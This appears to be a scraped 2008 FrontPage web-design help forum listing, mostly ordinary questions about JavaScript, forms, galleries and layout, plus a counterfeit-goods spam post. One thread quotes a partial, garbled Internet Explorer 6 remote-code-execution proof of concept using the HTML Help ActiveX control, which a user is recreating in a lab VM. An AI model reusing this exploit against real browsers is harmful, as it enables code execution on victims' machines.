Thursday, 3 July 2008
|
| Re: Using JavaScript Stefan B Rusynko 15:35:00 |
| | Please Stop Posting any post until you clean (virus scan) your PC - your posts are all infected with a Worm VBS/Phel.J
--
_____________________________________________ SBR @ ENJOY [ Microsoft MVP - FrontPage ] "Warning - Using the F1 Key will not break anything!" (-; _____________________________________________
|
| | 1 answer | Add comment |
Wednesday, 2 July 2008
|
| Can't get external javascript to run within FP2003 Nick Hebb 15:11:19 |
| | I can't get javascript to run from external files in Preview mode. If the entire script is placed within the page, it previews fine in FP. If I upload the page and external javascript to my server, it runs fine.
But whenever I try to preview a page in FP2003 with external script I get the following error message:
Line: 2 Character: 1 Error: Invalid character: Code: 0
Note: It doesn't matter what the script is - I get the same error message.
Can anyone shed some light on why this might be happening?
|
| | 5 answers | Add comment |
|
| Find and Replace VB Macros Kj 12:12:20 |
| | I have 1000+ Word documents that I need to make into Web pages. I am saving the .doc as .htm but then I have to go into the .htm and make several repetitive changes to meet my sites requirements and eliminate code generated by Frontpage. I want to built a macro in Frontpage's VB to find HTML tags and/or attributes and replace them. So far what I have been able to find online has "issues". For example I want to remove class=MsoNormal within the <p> tag (in a table) and find class=MsoTableWeb1 in the table tag and replace it with class=panel.
On my wishlist items, if there is a way to do this task to all 1000 .htm documents at one time, I would really be estatic.
Any ideas are greatly appreciated.
|
| | 3 answer | Add comment |
Tuesday, 1 July 2008
|
| Re: Recreating Old code execution Vulnerability Steve Easton 23:56:17 |
| | Nothing personal but I think I'll pass.
--
Steve Easton Microsoft MVP FrontPage FP Cleaner http://www.95isalive.com/fixes/fpclean.htm Hit Me FP http://www.95isalive.com/fixes/HitMeFP.htm
"Diogo" <Diogo@discussions.microsoft.com> wrote in message news:F65BA7DF-C92A-4251-91D9-55AAC129FED6@microsoft.com...
I'm trying to recreate an old IE 6.0 vulnerability in a windows XP-SP2 box, for learning purposes. I'm using VMware (XP-SP2 unpatched box). When I browse to my index.htm page I get the following error: "An error has occured in the script onthis page. Line: 4 Char: 1 Error: Invalid character Code: 0 URL: ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm Do you want to continue running scripts on this page?" I then punch yes but nothing happens. This is the code behind my index.htm "Download this file as well for your own testing: original htm.txt //str0ke --> <html><head><title>CMDExe - Windows Exploit - Remote code execution with parameters - Proof of Concept</title></head><BODY style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this exploit can be found at <a <script> function DisplayLocStrings() { Title.innerHTML = TAG_SYSCONFIG; Config_Link.innerHTML = TAG_OPENSYSCONFIG; Config_Desc.innerHTML = TAG_SYSCONFIGDESC; } </script> <br><OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:_"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm"> </OBJECT> <OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:_"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"javascript\\\" </OBJECT> <script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html> Could someone help please.
|
| | 3 answer | Add comment |
Saturday, 28 June 2008
|
| Re: Shifting Cells - frontpage vs browsers - Basic Question Jens Peter Karlsen 23:22:47 |
| | It is very evident that the second screenshot is from a widescreen monitor (You can see the browser is in fullscreen). He may have it set at 1024x768px but a widescreen monitor will in most cases automatically correct that to the closest resolution suitable for the screen. Since you talk of a 15 inch screen it is probably a laptop and that will usually be widescreen.
Regards Jens Peter Karlsen.
On Mon, 23 Jun 2008 13:44:13 -0700 (PDT), CK <courtenay@inkoncanvas.com> wrote:
On 23 Jun, 21:11, "Steve Easton" <ad...@95isalive.com> wrote: Looks like he either has a wide screen monitor at home, or has the resolution set at a higher setting. It's not the web page it's a user setting. "CK" <courte...@inkoncanvas.com> wrote in message news:3e75c639-9cdd-44f4-b285-3707caa16a3e@l42g2000hsc.googlegroups.com... I m wondering if anyone can offer me some advice ? I have created a website for my client, when I test it on my aol and IE it appears perfect as in the first screen grab attached, when my client opens it in his salon he sees the same thing but when he opens it at home he sees the 2nd screen grab. I have checked my tables and have insured that all cells calculate 800px by 600px. Could you please advise me on what you think maybe causing the shift in the images/cells? He has checked and he has a 15inch square monitor and resolution is set to 1024/768....that should be correct right? any other possibilities? i appreciate your comments on this. C |
| | Add comment |
|
| Strange JavaScript Question Mike McCollister 04:56:18 |
| | I am trying to do what is most likely impossible. In JavaScript I want to know the variable name that a new object is assigned to from within the object. For example, if I do this
var testObject = new TestObject();
then the TestObject object will, with some magic function, get the assignment variable name which in the above case is "testObject". I'm thinking that the caller or callee property might be of use.
function TestObject() { // constructor { // constructor stuff here var html = "";
var assignmentName = SomeMagicFunction(); // ??? where's the magic
html += "<img onClick='" + assignmentName + ".DoThisFunction()'>";
document.writeln(html); } }
If this is impossible, I'll just pass the assignee name as a parameter to the object. Just wanting to make the object as smart as possible.
Thanks,
Mike
|
| | 1 answer | Add comment |
Thursday, 26 June 2008
|
| china wholesale gucci prada lacoste puma trainers chanel fendi lv handbags Overinstock 18:59:18 |
| | Welcome to visit [url]www.chinanike-wholesale.com[/url] We Wholesale Cheap Jordan Shoes, Michael Jordan Shoes, Nike Jordan Basketball shoes, ... Jordan Shoes, Air Jordan Sneakers, Air Jordan Wholesale All of the Air Jordan sneakers have Nike Air in the shoes. Authentic quality Jordan Sneakers Custom Jordan Sneakers Wholesale Jordan Sneakers gucci sneakers prada sneakers,lv chanel coach dior DG DSQUARED2 DIESEL,miumiu handbags sneakers,t-shirts,jeans,jackets.We sale new Nike Sneakers,Air Jordan Sneakers,AIR FORCE 1S,Nike Dunks SB, Bape Sta from nike outlets and factory stores, also Nike wholesale - Jordan Shoes. Nike Shoes, sport Shoes, Reebok Shoes,Basketball Shoes,prada,bapestar,Nike Shox,Dunks,Nike Flightposite ,Nike jordan Basketball ,K1X Chiefglider wholesale suppliers factory.We sale new Nike Sneakers,Air Jordan Sneakers,AIR FORCE 1S,Nike Dunks SB, Bape Sta from nike Wholesale china nike jordans gucci prada sneakers at cheap price !!! Email: overinstock@yahoo.com.cn MSN: chinanike-wholesale@hotmail.com
+----------------------------------------------------------------+ | Attachment filename: gucci005.jpg | |Download attachment: http://www.forum4designers.com/attachment.php?postid=2516155 | +----------------------------------------------------------------+
-- overinstock ------------------------------------------------------------------------ Posted via http://www.codecomments.com ------------------------------------------------------------------------
|
| | 2 answer | Add comment |
Saturday, 21 June 2008
|
| Forms with FP 2003 Izod 19:23:04 |
| | Now according to the form property tab, I should be able to put in an email address and have a copy of the form sent to me or anyone's email address after user fills it out. I cannot get it to work. I've got FP Extensions on the host and here is the message I continue to get.
Cannot run the FrontPage Server Extensions on this page: "http://trailerestatesflorida.com/test_form.htm" --
Isn't this suppose to work? I've ask the Host but they keep me running around and not answering me direct. They have php and mysql. Do I have to do server side scripts to do this? Thanks.
Izod
|
| | 2 answer | Add comment |
|
| IE7 window.open and resizeby problem Mike McCollister 13:51:06 |
| | I have a JavaScript function that I use to open up an image in a popup window when someone clicks on an image. It works fine in IE6 but in IE7 when I try to do a resizeBy to resize the window due to the scrollbar height the image does not come up sometimes. Does anyone know how to fix this?
I've included my function. below.
Thanks,
Mike
function DisplayImage(image, width, height, title, date) { var newWin; var winName; var title2 = unescape(title); var newTitle = title2; var newDate; var ieVersion = GetInternetExplorerVersion();
html = "";
title2 = "some code remove here";
html += "<html>" + endl; html += "<head>" + endl; html += "<title>" + newTitle + ": " + newDate + "</title>" + endl; html += "</head>" + endl; html += "<script>" + endl; html += "function PlaySound(url) {html += document.all.sound.src = url;}"; html += "</script>" + endl; html += "<body bgcolor='#FFFFFF' topmargin='0' leftmargin='0' " + "marginheight='0' marginwidth='0'>" + endl; html += "<p align='center'>" + endl; html += "<a href='javascript:window.close()'>" + "<img src='" + imageDir + "/" + image + "' width='" + width + "' height='" + height + "' alt='' " + "title='Click to Close Window' border='0'></a>" + endl; html += "</p>" + endl; html += "<font face='Arial'>" + endl; html += "<p align='center'><b>" + title2 + "</b><br>" + endl; html += date + "</p><p></p>" + endl; html += "</font>" + endl; html += "</body>" + endl; html += "</html>";
newWin = window.open("", "photoWindow", //winName, "width=" + width + ",height=" + height + ",menubar=yes" + ",resizable=yes" + ",scrollbars=yes", true);
// resize window only for Microsoft Internet Explorer if(navigator.appName == "Microsoft Internet Explorer") { // ???? PROBLEMS HERE IN IE7 ????? if((ieVersion >= 4) && (ieVersion <= 6)) { // I don't know why this needs to be done newWin.document.writeln("<html><body></body></html>");
// do the resize newWin.resizeBy(width - newWin.document.body.clientWidth, height - newWin.document.body.clientHeight); } }
newWin.document.writeln(html); newWin.document.close(); newWin.focus(); }
|
| | 2 answer | Add comment |
Thursday, 19 June 2008
|
| Problems with photogallery - FP extension 2003 Bill 16:35:14 |
| | Hello,
I have a web site that uses frontpage extensions 2003. When I add a photogallery it seems to work fine from within frontpage. However when I publish my site (to a web site on my local system or to a remote web site) all I get when I go to the photogallery page is a single line of text giving the url to real.htm. [/photogallery/photo00021505/real.htm]
Anyone have any ideas on what the problem could be?
Thanks, Bill
|
| | 2 answer | Add comment |
|
| FP Site Help James Odom 11:28:20 |
| | I have a web site that i use FP with and on the navation bar i have 2 top level pages. I would k=like to create 2 sites under the same domain name. is there a was to stop having to type the .htm with the second page as the main will do it because it is defalt. i would like to be able to give the web site as www.whatevery.com/fire. or if some one would tell me how to get it to do www.wahtevery.fire.com would be great
|
| | 1 answer | Add comment |
Tuesday, 17 June 2008
|
| Active Directory and Front Page Connection? Gina-B 12:04:45 |
| | My basic question is regarding how to create a connection between Active Directory and FrontPage.
I'm trying to create a phone list/team roster/employee directory for our company's intranet site. I want this list to be automatically updated from Active Directory, so that any changes in Active Directory (department change, phone number change, termination, etc) will be reflected in this 'team roster'. Thus far I've been completely unsuccessful in accomplishing this.
One way I think it might be possible to create an automatically-updating team roster is to create a webpart that pulls the appropriate data from Active Directory and then displays it in a list. I'm running Sharepoint Portal Server 2003 and Frontpage 2003 -- I'm thinking that if I add a database connection to Active Directory in the Data Source Catalog in Frontpage, I might be able to create such a webpart.
The way I've been trying to do this is by opening Frontpage, clicking "Data>Insert Data View", then in the Data Source Catalog/Select A Data Source, under Database Connections, selecting "Add to Catalog". I run into trouble when I try to "Configure Database Connection", as I can't get an custom OLEDB connection string to work at all -- I only receive errors such as "Server Error: An error occurred..." etc. Do you know how to create a connection between Active Directory and Frontpage? Or, is this even possible?
Here are a couple of the connection strings I’ve tried to no avail:
Provider=ADSDSOObject;User ID=myID;Password=myPassword;<LDAP://DC="private,DC=myCompany,DC=com">;(&(objectCategory=Person)(objectClass=User)(sn=*)))); subtree;
and also
Provider=ADSDSOObject;User ID=myID;Password=myPassword;<LDAP://servername/>;
THANKS so much for your help.
|
| | 1 answer | Add comment |
Sunday, 15 June 2008
|
| Making calculations in web page DK Stevenson 20:02:57 |
| | Is there any way to perform calculations on a web page using forms and text boxes for the viewer to enter information. Then having the answer appear within the same form. Not knowing VB or javascript, I was looking for a way to do this right on FP.
Any help or suggestions would be greatly appreciated!
|
| | 4 answer | Add comment |
Saturday, 14 June 2008
|
| Another Registration qustion Izod 18:27:09 |
| | Can I use FP to have a password sent to the responders email address. I would like to verify the email address. I see some sites are set up to do that. Do I have to do coding? or are the templates already there?
Izod
|
| | 4 answer | Add comment |
|
| protecting images on the web D. Hudson 18:25:04 |
| | I run windows XP Pro and Office 02 XP. On my web site for hobby photography I'm trying to protect my images. I have figured out the code to stop right clicking. The problem I have is this- The right click protection only works on my thumbnails. If you click the thumbnail to enlarge the image you're then able to right click and save the enlarged image. What is the code to protect the image after it's been clicked on, and does it go in the header too? Here's a link to one of my page if you want to see what I mean. http://www.just4funphotos.com/Craig%20Morgan.htm Thanks, Dennis
|
| | 3 answer | Add comment |
Friday, 13 June 2008
|
| How to capture page title Terry 16:40:00 |
| | Here is my problem. I would like to add a button on a web page that will do two things. First capture the page title Second open a form and paste (or fill in the captured data to one of the fields. New to front page please provide as much detail as possible.. Thank you in advance for your help or suggestions FrontPage 2003 -- Terry
|
| | 7 answers | Add comment |
Thursday, 12 June 2008
|
| Permission on Sub_Web Izod 18:52:20 |
| | I am trying to use the registration template. So I set up a SubWeb requiring registration with permissions.
Now, I would like to link direct to a page inside the subweb from the root web and require the viewer to register if they haven't already done so. When I link direct it by passes the registration requirement. Do I have to work around that or am I doing something wrong???
Izod
--
|
| | 7 answers | Add comment |
Wednesday, 11 June 2008
|
| Hide text and entry fields under certain conditions RColes 19:39:29 |
| | I wish to use the same page for several tasks. When I go to the page, how can I hide text and fields under certain conditions (i.e., hide if session("switch") = 1 and show if session("switch") <> 1? There are times that some instructions and entry fields are not needed. This is determined by the page preceeding this one (i.e. under conditions I know about before i get to that page).
For security sake, we will provide you with a folder to hold any files you create from our data and programs you wish to write. Enter Folder Name in text box (Less than 11 characters)
|
| | 1 answer | Add comment |
|
| Swaping link and text Guest 13:25:30 |
| | Hi I have a floating div script but need a link to show and hide it on our site. At present i can use the two links below
<p><a href="javascript:showMe();">Show mini basket</a> <p><a href="javascript:hideMe();">Hide mini basket</a>
But it would be nice to have them combined in to one link that changes properties and text on click. My Java/CSS is not great but any help would be very much appreciated.
Simon B
|
| | 11 answers | Add comment |
|
| Saving results from a Form to a database Joe 03:40:44 |
| | We created a page with a number of the standard fields on it - User Name, Password, Full Name, etc... In the form properties we picked Send to Database. The database was created with a results table. All the fields seem to be mapped correctly but when we try the page out nothing ever gets written to the table.
Is there another option or permission that needs to be set? We don't seem to be getting any errors.
Thanks for any help, Joe
|
| | 5 answers | Add comment |
Tuesday, 10 June 2008
|
| Database Result table. Lost 22:32:18 |
| | I am using FP2003. I am generating a Database result with the categories in a 3x4 table and in a single column list. How can I make that list generate in a 2 column list?
IE.
1 2 3 4 5 6.
Thanks in advance.
|
| | 1 answer | Add comment |
|
| Re: Drop down boxes Ronx 12:11:15 |
| | Any error messages? Are you testing in a browser or in FrontPage Preview? Are you using Windows XP SP2? Have you saved the page before testing it?
Following the instructions in that article should result in a page that either works, or gives an error message.
Can you post the code you have written here (from the <body> tag) Seeing the code being used will help diagnose the problem
-- Ron Symonds Microsoft MVP (FrontPage) Reply only to group - emails will be deleted unread.
"yvlt" <yvlt@discussions.microsoft.com> wrote in message news:1A5C2EDF-750E-48D7-AC6E-84DFB11F991D@microsoft.com...>I viewed the answers to other posted questions regarding drop down >boxes in> FP2003. I followed the link See> www.interlacken.com/winnt/tips/tipshow.aspx?tip=28 and the > directions but I> nothing seems to work. Specifically, when I mouseover the main menu > command> my first leaf should appear but nothing happens. I am diskbased now > and> can't post yet (too many errors on site w/r/t main menu bar). I am > not using> a navigation link bar I developed a hyperlink table instead (as per > the> instructions) Can you help?> YVLT>
|
| | 5 answers | Add comment |
Monday, 9 June 2008
|
| Multiple Users FrontPage 12:18:42 |
| | I have a DRW application where I would like to allow multiple authorized users to edit their info, but I only want them to have access to their own info.
Can I have multiple logins using DRW?
Thanks John P.
|
| | 1 answer | Add comment |
Friday, 6 June 2008
|
| Dumb Question #2 Jim K 23:03:04 |
| | I am a beginner and I am developing a webpage but the site does not display correctly on all monitors. On wide monitors (the site was developed on wide LCD monitors and the site looks fine if the visitor is using a wide screen. If the user is not using a wide screen, then the right portion of the screen is truncated. I suppose there is some method of ascertaining if the visitor is using a wide screen or not and make resolution changes accordingly. Can anyone help me? Thanks in advance, Jim
|
| | 1 answer | Add comment |
|
| Editing gallery? Lars Christensen 22:16:59 |
| | Hello.
I'm hoping for help from this Forum, as this problem really puzzles me.
I have had problems with editing the galleries I have on my website. The error came after my Frontpagefiles got messed up. (Probably my error) So I decided to download the entire site from the server and save it locally instead of the messed up files. Since then, the galleries in Frontpage, turned into a lot of frames with text and pictures. But not the usual guide for galleries in Frontpage.
I can create new galleries, but it is a good deal of work to make my galleries again.
Thanks very much up front for any help from here.
Regards
Lars Christensen Lars www.larchris.dk
|
| | Add comment |
|